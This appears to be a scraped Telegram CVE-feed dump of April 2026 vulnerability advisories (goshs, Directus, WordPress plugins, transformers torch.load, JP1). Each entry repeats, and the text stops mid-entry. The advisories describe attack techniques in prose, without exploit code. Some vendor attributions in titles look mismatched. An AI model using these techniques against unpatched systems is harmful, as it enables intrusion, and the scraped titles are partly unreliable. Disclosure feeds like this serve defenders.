{
"Source": "CVE FEED",
"Title": "CVE-2026-35471 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in goshs",
"Content": "CVE ID :CVE-2026-35471
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.3, tdeleteFile() missing return after path traversal check. This vulnerability is fixed in 2.0.0-beta.3.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-35471 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in goshs",
"Content": "CVE ID :CVE-2026-35471
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.3, tdeleteFile() missing return after path traversal check. This vulnerability is fixed in 2.0.0-beta.3.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-35413 - Directus GraphQL Schema SDL Disclosure Setting",
"Content": "CVE ID :CVE-2026-35413
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. This vulnerability is fixed in 11.16.1.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-35413 - Directus GraphQL Schema SDL Disclosure Setting",
"Content": "CVE ID :CVE-2026-35413
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. This vulnerability is fixed in 11.16.1.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-35441 - Directus Affected by GraphQL Alias Amplification Denial-of-Service Due to Missing Query Cost/Complexity Limits",
"Content": "CVE ID :CVE-2026-35441
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0.
Severity: 6.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-35441 - Directus Affected by GraphQL Alias Amplification Denial-of-Service Due to Missing Query Cost/Complexity Limits",
"Content": "CVE ID :CVE-2026-35441
Published : April 6, 2026, 10:16 p.m. | 1 hour, 15 minutes ago
Description :Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0.
Severity: 6.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-5705 - code-projects Online Hotel Booking Booking Endpoint booknow.php cross site scripting",
"Content": "CVE ID :CVE-2026-5705
Published : April 7, 2026, 12:16 a.m. | 1 hour, 15 minutes ago
Description :A vulnerability was identified in code-projects Online Hotel Booking 1.0. Affected by this vulnerability is an unknown functionality of the file /booknow.php of the component Booking Endpoint. Such manipulation of the argument roomname leads to cross site scripting. It is possible to launch the attack remotely. The exploit is publicly available and might be used.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-5705 - code-projects Online Hotel Booking Booking Endpoint booknow.php cross site scripting",
"Content": "CVE ID :CVE-2026-5705
Published : April 7, 2026, 12:16 a.m. | 1 hour, 15 minutes ago
Description :A vulnerability was identified in code-projects Online Hotel Booking 1.0. Affected by this vulnerability is an unknown functionality of the file /booknow.php of the component Booking Endpoint. Such manipulation of the argument roomname leads to cross site scripting. It is possible to launch the attack remotely. The exploit is publicly available and might be used.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-5719 - itsourcecode Construction Management System borrowedtool.php sql injection",
"Content": "CVE ID :CVE-2026-5719
Published : April 7, 2026, 3:16 a.m. | 17 minutes ago
Description :A flaw has been found in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /borrowedtool.php. Executing a manipulation of the argument code can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.
Severity: 6.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-5719 - itsourcecode Construction Management System borrowedtool.php sql injection",
"Content": "CVE ID :CVE-2026-5719
Published : April 7, 2026, 3:16 a.m. | 17 minutes ago
Description :A flaw has been found in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /borrowedtool.php. Executing a manipulation of the argument code can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.
Severity: 6.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-13044 - Multiple Vulnerabilities in IBM Concert Software",
"Content": "CVE ID :CVE-2025-13044
Published : April 7, 2026, 2:16 a.m. | 1 hour, 17 minutes ago
Description :IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Severity: 6.2 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2025-13044 - Multiple Vulnerabilities in IBM Concert Software",
"Content": "CVE ID :CVE-2025-13044
Published : April 7, 2026, 2:16 a.m. | 1 hour, 17 minutes ago
Description :IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Severity: 6.2 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-1839 - Arbitrary Code Execution via Unsafe torch.load() in Trainer Checkpoint Loading in huggingface/transformers",
"Content": "CVE ID :CVE-2026-1839
Published : April 7, 2026, 5:22 a.m. | 14 minutes ago
Description :A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-1839 - Arbitrary Code Execution via Unsafe torch.load() in Trainer Checkpoint Loading in huggingface/transformers",
"Content": "CVE ID :CVE-2026-1839
Published : April 7, 2026, 5:22 a.m. | 14 minutes ago
Description :A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-65115 - Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 and JP1/NETM/DM",
"Content": "CVE ID :CVE-2025-65115
Published : April 7, 2026, 5:19 a.m. | 16 minutes ago
Description :Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.
Severity: 8.8 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2025-65115 - Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 and JP1/NETM/DM",
"Content": "CVE ID :CVE-2025-65115
Published : April 7, 2026, 5:19 a.m. | 16 minutes ago
Description :Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.
Severity: 8.8 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-0740 - Ninja Forms - File Upload <= 3.3.26 - unauthenticated arbitrary file upload",
"Content": "CVE ID :CVE-2026-0740
Published : April 7, 2026, 5:16 a.m. | 20 minutes ago
Description :The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-0740 - Ninja Forms - File Upload <= 3.3.26 - unauthenticated arbitrary file upload",
"Content": "CVE ID :CVE-2026-0740
Published : April 7, 2026, 5:16 a.m. | 20 minutes ago
Description :The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20446 - "Microsoft Secure Boot integer overflow allows local denial of service and physical device compromise"",
"Content": "CVE ID :CVE-2026-20446
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-20446 - "Microsoft Secure Boot integer overflow allows local denial of service and physical device compromise"",
"Content": "CVE ID :CVE-2026-20446
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20432 - Huawei Modem Out-of-Bounds Write Privilege Escalation Vulnerability",
"Content": "CVE ID :CVE-2026-20432
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-20432 - Huawei Modem Out-of-Bounds Write Privilege Escalation Vulnerability",
"Content": "CVE ID :CVE-2026-20432
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20433 - Huawei Modem Out-of-Bounds Write Privilege Escalation",
"Content": "CVE ID :CVE-2026-20433
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-20433 - Huawei Modem Out-of-Bounds Write Privilege Escalation",
"Content": "CVE ID :CVE-2026-20433
Published : April 7, 2026, 4:17 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-20431 - "Modem Remote Denial of Service Vulnerability"",
"Content": "CVE ID :CVE-2026-20431
Published : April 7, 2026, 4:16 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-20431 - "Modem Remote Denial of Service Vulnerability"",
"Content": "CVE ID :CVE-2026-20431
Published : April 7, 2026, 4:16 a.m. | 1 hour, 19 minutes ago
Description :In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-5465 - Amelia <= 2.1.3 - insecure direct object reference to authenticated (employee+) privilege escalation via 'externalid' parameter",
"Content": "CVE ID :CVE-2026-5465
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.3. This is due to the `UpdateProviderCommandHandler` failing to validate changes to the `externalId` field when a Provider (Employee) user updates their own profile. The `externalId` maps directly to a WordPress user ID and is passed to `wp_set_password()` and `wp_update_user()` without authorization checks. This makes it possible for authenticated attackers, with Provider-level (Employee) access and above, to take over any WordPress account — including Administrator — by injecting an arbitrary `externalId` value when updating their own provider profile.
Severity: 8.8 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-5465 - Amelia <= 2.1.3 - insecure direct object reference to authenticated (employee+) privilege escalation via 'externalid' parameter",
"Content": "CVE ID :CVE-2026-5465
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.3. This is due to the `UpdateProviderCommandHandler` failing to validate changes to the `externalId` field when a Provider (Employee) user updates their own profile. The `externalId` maps directly to a WordPress user ID and is passed to `wp_set_password()` and `wp_update_user()` without authorization checks. This makes it possible for authenticated attackers, with Provider-level (Employee) access and above, to take over any WordPress account — including Administrator — by injecting an arbitrary `externalId` value when updating their own provider profile.
Severity: 8.8 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-15611 - Popup Box AYS Pro < 5.5.0 - Admin+ Stored Cross-Site Scripting (XSS) via CSRF",
"Content": "CVE ID :CVE-2025-15611
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2025-15611 - Popup Box AYS Pro < 5.5.0 - Admin+ Stored Cross-Site Scripting (XSS) via CSRF",
"Content": "CVE ID :CVE-2025-15611
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-1114 - Improper Access Control via Weak JWT Token in parisneo/lollms",
"Content": "CVE ID :CVE-2026-1114
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-1114 - Improper Access Control via Weak JWT Token in parisneo/lollms",
"Content": "CVE ID :CVE-2026-1114
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0.
Severity: 9.8 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-1900 - Link Whisper Free < 0.9.1 - Unauthenticated Settings and User Meta Update",
"Content": "CVE ID :CVE-2026-1900
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-1900 - Link Whisper Free < 0.9.1 - Unauthenticated Settings and User Meta Update",
"Content": "CVE ID :CVE-2026-1900
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-4079 - SQL Chart Builder < 2.3.8 - Unauthenticated SQL Injection",
"Content": "CVE ID :CVE-2026-4079
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The SQL Chart Builder WordPress plugin before 2.3.8 does not properly escape user input as it is concatened to SQL queries, making it possible for attackers to conduct SQL Injection attacks against the dynamic filter functionality.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-4079 - SQL Chart Builder < 2.3.8 - Unauthenticated SQL Injection",
"Content": "CVE ID :CVE-2026-4079
Published : April 7, 2026, 7:16 a.m. | 22 minutes ago
Description :The SQL Chart Builder WordPress plugin before 2.3.8 does not properly escape user input as it is concatened to SQL queries, making it possible for attackers to conduct SQL Injection attacks against the dynamic filter functionality.
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2025-65116 - Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 and JP1/NETM/DM",
"Content": "CVE ID :CVE-2025-65116
Published : April 7, 2026, 6:16 a.m. | 1 hour, 22 minutes ago
Description :Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: 